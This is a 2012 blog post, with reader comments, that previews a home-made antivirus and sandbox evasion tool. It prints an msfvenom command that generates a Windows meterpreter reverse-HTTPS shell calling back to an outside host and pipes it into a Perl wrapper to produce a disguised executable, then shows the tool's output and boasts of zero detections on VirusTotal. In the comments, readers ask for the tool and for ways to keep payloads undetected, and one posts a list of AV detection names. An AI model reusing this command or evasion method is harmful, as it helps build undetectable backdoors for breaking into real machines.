Antivirus Sandbox Evasion (part1) – Preview
Hmmm, it seems that I wrote something very nice ..
$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \ | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe [*ultimate] Waiting for payload from STDIN [*ultimate] Payload: read (size: 367) [*ultimate] Payload: encode (new size: 1161) [*ultimate] Template: read 94720 bytes from file [*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928 [*ultimate] Output: add the begin of the template (size: 36928) [*ultimate] Output: add the encoded payload (size: 1161) [*ultimate] Output: add the end of the template (size: 18502) [*ultimate] File '/tmp/payload.exe' generated (size: 94720)
WTF is that ? “That” is my new toy. An Antivirus evasion tool which bypass signature, heuristic and … sandbox detections ;-)
Tested on VirtusTotal.com (zero detection over 44), then on Virtual machines against:
- Avast
- AVG
- BitDefender
- Kaspersky
- McAfee
- MS Essential Security
- ESET Nod32
- GData
- F-Secure
- Panda
- Sophos
- Symantec (of course)
So far so good. Let me play a bit with it. As soon as I find an other (private) method, I swear to release this one …
Stay tuned ;-)
(5 votes, average: 5.00 out of 5)
Loading...
© 2012, foip. All rights reserved.
14 Comments
→
Great post !!! Pls keep sharing — TKS
hi were can i get your ultimate-payload.pl ? for testing ? :P
template Work?
The perl script use a homemade encoder, but the important part (for sandbox evasion) is well in the template.
I saw on your blog that you also had fun with this exciting challenge ;-)
Cheers.
Well done that’s a good job.friend where are we to insert the payload.is it at Dos command prompt or at config.sys or metasploit or other?
I can’t execute line code below on backtrack 5, problem with ultimate-payload.pl
can you help me please
You should keep it private. As soon as you release it will be added to AV databases.
;-)
Virustotal 10/42!!!!!!!
Thank you for this update. Glad to see that AV vendors are working..
Since the tool has been released, the score can’t stay eternally at 0/42 ..
if you want to reach 0/42 again, use your immagination ;)
Hi
payloads created with your template are now detected with antiviruses :
———————————————————————–
Agnitum Backdoor.Swrort!Ar5xwgxMbks 20121008
Avast Win32:Malware-gen 20121008
AVG Generic28.CKZJ 20121008
BitDefender Trojan.Generic.KDV.673845 201210078191
Emsisoft Trojan.Win32.Swrort!IK 20120919
F-Secure Trojan.Generic.KDV.673845 20121003
Fortinet W32/Crypt.BBCR!tr 20121008
GData Trojan.Generic.KDV.673845 20121009
Ikarus Trojan.Win32.Swrort 20121008
Jiangmin Backdoor/Bifrose.xur 20121008
Kaspersky HEUR:Trojan.Win32.Generic 20121009
Kingsoft VIRUS_UNKNOWN 20121008
Heuristic.BehavesLike.Win32.Suspicious-BAY.K 20121008
Microsoft Trojan:Win32/Swrort.A 20121009
MicroWorld-eScan Trojan.Generic.KDV.673845 20121009
nProtect Trojan/W32.Agent.117248.CS 20121008
TrendMicro-HouseCall – 20121008
VBA32 Backdoor.Swrort.pt 20121008
VIPRE BehavesLike.Win32.Malware.bsf (vs) 20121008
—————————————————————
Can you tell me how i can edit it to prevent antivirus detection
thanks.
Nice work, thanks!
Very nice but the worst thing you did was upload it to virus total. Always test in a virtual machine and multiple AV’s.
;-)
I know. But managing 44 AV on virtual machines was a bit to much for me. When I find that my code works as expected, I keep the concept and start a new one.
Thanks for reading and commenting! Cheers.